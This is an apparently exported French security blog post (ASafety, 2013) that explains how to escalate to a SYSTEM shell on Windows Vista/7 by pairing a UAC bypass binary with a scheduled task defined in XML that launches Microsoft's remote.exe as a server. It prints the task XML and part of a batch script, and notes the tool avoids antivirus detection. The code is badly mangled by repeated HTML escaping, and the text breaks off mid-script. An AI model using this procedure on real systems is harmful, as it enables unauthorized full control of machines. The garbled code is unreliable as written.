{"id":1030,"date":"2013-09-01T14:04:47","date_gmt":"2013-09-01T12:04:47","guid":{"rendered":"https:\/\/www.asafety.fr\/?p=1030"},"modified":"2016-07-25T00:41:00","modified_gmt":"2016-07-24T22:41:00","slug":"win-vista7-escalade-de-privilege-via-schtasks-et-bypass-uac","status":"publish","type":"post","link":"https:\/\/www.asafety.fr\/en\/vuln-exploit-poc\/win-vista7-escalade-de-privilege-via-schtasks-et-bypass-uac\/","title":{"rendered":"[Win Vista,7] Escalade de privil\u00e8ge via SCHTASKS et bypass UAC"},"content":{"rendered":"<p><\/p>\n<p><p>Il y a quelques jours ASafety vous communiquait la technique d&#8217;<a title=\"Escalade de privil\u00e8ge via AT et bypass UAC\" href=\"https:\/\/www.asafety.fr\/vuln-exploit-poc\/windows-vista7-escalade-de-privilege-via-at-et-bypass-uac\/\" target=\"_blank\">escalade de privil\u00e8ge SYSTEM sur les environnements Windows r\u00e9cents avec la m\u00e9thode AT<\/a> remise au go\u00fbt du jour.<\/p>\n<p>Vous n&#8217;\u00eates pas sans savoir que la commande AT de gestion des t\u00e2ches planifi\u00e9es est consid\u00e9r\u00e9e comme obsol\u00e8te sur les OS Windows depuis Vista. Son digne successeur se nomme &#8220;schtask&#8221;. Cette nouvelle commande fournit un grand nombre de fonctionnalit\u00e9s additionnelles, notamment le param\u00e9trage complet d&#8217;une t\u00e2che planifi\u00e9e \u00e0 partir d&#8217;un fichier XML.<\/p>\n<p>L&#8217;id\u00e9e est toujours la m\u00eame, exploiter le scheduler de t\u00e2che natif sous Windows pour l&#8217;obtention de privil\u00e8ge d&#8217;administration SYSTEM sur la machine. Ces techniques sont toutes aussi utiles pour les administrateurs syst\u00e8mes, les int\u00e9grateurs de solutions logicielles que pour les pentesteurs.<\/p>\n<p>Les principaux points bloquants pour l&#8217;obtention d&#8217;un shell SYSTEM via les t\u00e2ches planifi\u00e9es sont :<\/p>\n<ul>\n<li>La n\u00e9cessit\u00e9 d&#8217;un shell sous un compte &#8220;administrateur&#8221;<\/li>\n<li>Le bypass de l&#8217;UAC (<a title=\"UAC\" href=\"https:\/\/en.wikipedia.org\/wiki\/User_Account_Control\" target=\"_blank\"><em>User Account Control<\/em><\/a>)<\/li>\n<li>L&#8217;obtention d&#8217;un shell avec une interactivit\u00e9 graphique moindre (pour faciliter le travail des pentesteurs)<\/li>\n<\/ul>\n<p>Comme d\u00e9taill\u00e9 dans le pr\u00e9c\u00e9dent article cit\u00e9 ci-dessus, le bypass de l&#8217;UAC se fait ais\u00e9ment \u00e0 l&#8217;aide de nombreux outils, notamment celui du projet &#8220;<a title=\"bypassuac\" href=\"https:\/\/www.trustedsec.com\/downloads\/tools-download\/\" target=\"_blank\">bypassuac<\/a>&#8220;. Il est n\u00e9cessaire de ce munir de ce binaire sur le syst\u00e8me cibl\u00e9.<\/p>\n<p>Pour r\u00e9duire l\u2019interactivit\u00e9 graphique, l&#8217;outil &#8220;remote.exe&#8221; fourni par Microsoft dans les <a title=\"Windows Debugger Tools\" href=\"http:\/\/msdn.microsoft.com\/en-US\/windows\/hardware\/gg463009\/\" target=\"_blank\">Windows Debugger Tools<\/a> est amplement suffisant pour plusieurs raisons :<\/p>\n<ul>\n<li>Il assure la partie cliente et serveur \u00e0 la fois<\/li>\n<li>Il existe une version x86 et x64 standalone<\/li>\n<li>Il est l\u00e9gitime de Microsoft et n&#8217;est donc pas consid\u00e9r\u00e9 comme un programme suspect par les antivirus (id\u00e9al pour les pentesteurs)<\/li>\n<li>Il op\u00e8re \u00e0 m\u00eame le terminal courant, permettant ainsi d&#8217;une \u00e9l\u00e9vation de privil\u00e8ge m\u00eame dans les shell restreints<\/li>\n<\/ul>\n<p>&#8220;Schtasks&#8221; est le successeur de la commande &#8220;at&#8221; depuis Windows Vista. Tous les deux font appel au scheduler pour ex\u00e9cuter des actions planifi\u00e9es sous un contexte d\u00e9fini. Dans le cas de &#8220;schtasks&#8221;, ce contexte peut se d\u00e9clarer dans un fichier XML.<\/p>\n<p>Une fois la machine cible \u00e9quip\u00e9e du binaire &#8220;bypassuac.exe&#8221; et de &#8220;remote.exe&#8221;, il suffit de cr\u00e9er un fichier &#8220;schtasks.xml&#8221; avec les param\u00e8tres ad\u00e9quates :<\/p>\n<p>[xml]&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;lt;?xml version=&amp;amp;amp;amp;amp;amp;quot;1.0&amp;amp;amp;amp;amp;amp;quot; encoding=&amp;amp;amp;amp;amp;amp;quot;UTF-16&amp;amp;amp;amp;amp;amp;quot;?&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;amp;lt;Task version=&amp;amp;amp;amp;amp;amp;quot;1.2&amp;amp;amp;amp;amp;amp;quot; xmlns=&amp;amp;amp;amp;amp;amp;quot;http:\/\/schemas.microsoft.com\/windows\/2004\/02\/mit\/task&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;RegistrationInfo&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Date&amp;amp;amp;amp;amp;amp;gt;2008-03-26T16:40:47.4520087&amp;amp;amp;amp;amp;amp;lt;\/Date&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Author&amp;amp;amp;amp;amp;amp;gt;CONTOSO\\Administrator&amp;amp;amp;amp;amp;amp;lt;\/Author&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/RegistrationInfo&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Triggers \/&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Principals&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Principal id=&amp;amp;amp;amp;amp;amp;quot;Author&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;UserId&amp;amp;amp;amp;amp;amp;gt;SYSTEM&amp;amp;amp;amp;amp;amp;lt;\/UserId&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;RunLevel&amp;amp;amp;amp;amp;amp;gt;HighestAvailable&amp;amp;amp;amp;amp;amp;lt;\/RunLevel&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/Principal&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/Principals&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Settings&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;IdleSettings&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Duration&amp;amp;amp;amp;amp;amp;gt;PT10M&amp;amp;amp;amp;amp;amp;lt;\/Duration&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;WaitTimeout&amp;amp;amp;amp;amp;amp;gt;PT1H&amp;amp;amp;amp;amp;amp;lt;\/WaitTimeout&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;StopOnIdleEnd&amp;amp;amp;amp;amp;amp;gt;true&amp;amp;amp;amp;amp;amp;lt;\/StopOnIdleEnd&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;RestartOnIdle&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/RestartOnIdle&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/IdleSettings&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;MultipleInstancesPolicy&amp;amp;amp;amp;amp;amp;gt;IgnoreNew&amp;amp;amp;amp;amp;amp;lt;\/MultipleInstancesPolicy&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;DisallowStartIfOnBatteries&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/DisallowStartIfOnBatteries&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;StopIfGoingOnBatteries&amp;amp;amp;amp;amp;amp;gt;true&amp;amp;amp;amp;amp;amp;lt;\/StopIfGoingOnBatteries&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;AllowHardTerminate&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/AllowHardTerminate&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;StartWhenAvailable&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/StartWhenAvailable&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;RunOnlyIfNetworkAvailable&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/RunOnlyIfNetworkAvailable&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;AllowStartOnDemand&amp;amp;amp;amp;amp;amp;gt;true&amp;amp;amp;amp;amp;amp;lt;\/AllowStartOnDemand&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Enabled&amp;amp;amp;amp;amp;amp;gt;true&amp;amp;amp;amp;amp;amp;lt;\/Enabled&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Hidden&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/Hidden&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;RunOnlyIfIdle&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/RunOnlyIfIdle&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;WakeToRun&amp;amp;amp;amp;amp;amp;gt;false&amp;amp;amp;amp;amp;amp;lt;\/WakeToRun&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;ExecutionTimeLimit&amp;amp;amp;amp;amp;amp;gt;PT0S&amp;amp;amp;amp;amp;amp;lt;\/ExecutionTimeLimit&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Priority&amp;amp;amp;amp;amp;amp;gt;7&amp;amp;amp;amp;amp;amp;lt;\/Priority&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/Settings&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Actions Context=&amp;amp;amp;amp;amp;amp;quot;Author&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Exec&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Command&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;quot;C:\\remote.exe&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;lt;\/Command&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;Arguments&amp;amp;amp;amp;amp;amp;gt;\/s cmd SYSCMD&amp;amp;amp;amp;amp;amp;lt;\/Arguments&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;WorkingDirectory&amp;amp;amp;amp;amp;amp;gt;C:\\&amp;amp;amp;amp;amp;amp;lt;\/WorkingDirectory&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/Exec&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n &amp;amp;amp;amp;amp;amp;lt;\/Actions&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;amp;lt;\/Task&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;[\/xml]<\/p>\n<p>Dans ce fichier, plusieurs lignes sont \u00e0 modifier :<\/p>\n<ul>\n<li>La ligne de l&#8217;utilisateur pour l&#8217;ex\u00e9cution (SYSTEM) :<\/li>\n<\/ul>\n<p>[xml]&amp;amp;amp;amp;amp;amp;lt;UserId&amp;amp;amp;amp;amp;amp;gt;SYSTEM&amp;amp;amp;amp;amp;amp;lt;\/UserId&amp;amp;amp;amp;amp;amp;gt;[\/xml]<\/p>\n<ul>\n<li>La commande \u00e0 ex\u00e9cuter, \u00e0 savoir &#8220;remote.exe&#8221; via son chemin d&#8217;acc\u00e8s absolu :<\/li>\n<\/ul>\n<p>[xml]&amp;amp;amp;amp;amp;amp;lt;Command&amp;amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;amp;quot;C:\\remote.exe&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;lt;\/Command&amp;amp;amp;amp;amp;amp;gt;[\/xml]<\/p>\n<ul>\n<li>Les param\u00e8tres \u00e0 transmettre \u00e0 la commande, \u00e0 savoir lancer &#8220;remote.exe&#8221; en tant que serveur avec les privil\u00e8ges SYSTEM :<\/li>\n<\/ul>\n<p>[xml]&amp;amp;amp;amp;amp;amp;lt;Arguments&amp;amp;amp;amp;amp;amp;gt;\/s cmd SYSCMD&amp;amp;amp;amp;amp;amp;lt;\/Arguments&amp;amp;amp;amp;amp;amp;gt;[\/xml]<\/p>\n<ul>\n<li>Enfin le r\u00e9pertoire de travail arbitraire :<\/li>\n<\/ul>\n<p>[xml]&amp;amp;amp;amp;amp;amp;lt;WorkingDirectory&amp;amp;amp;amp;amp;amp;gt;C:\\&amp;amp;amp;amp;amp;amp;lt;\/WorkingDirectory&amp;amp;amp;amp;amp;amp;gt;[\/xml]<\/p>\n<p>Une fois ces modifications faites, le script Batch .bat suivant recense la suite des op\u00e9rations :<\/p>\n<p>[bash]&amp;amp;amp;amp;amp;lt;\/p&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n&amp;amp;amp;amp;amp;lt;p&amp;amp;amp;amp;amp;gt;:: Provided by ASafety.fr&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n@echo off&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\nset BYPASSUACPATH=C:\\bypassuac.exe&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\nset REMOTEPATH=C:\\remote.exe&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\nset XMLPATH=C:\\schtasks.xml&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n%BYPASSUACPATH% \/c schtasks \/delete \/tn RemoteAsSystem \/F&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;<br \/>\n%BYPASSUACPATH% \/c schtasks \/create \/tn RemoteAsSystem \/xml %XMLPATH%&amp;amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br 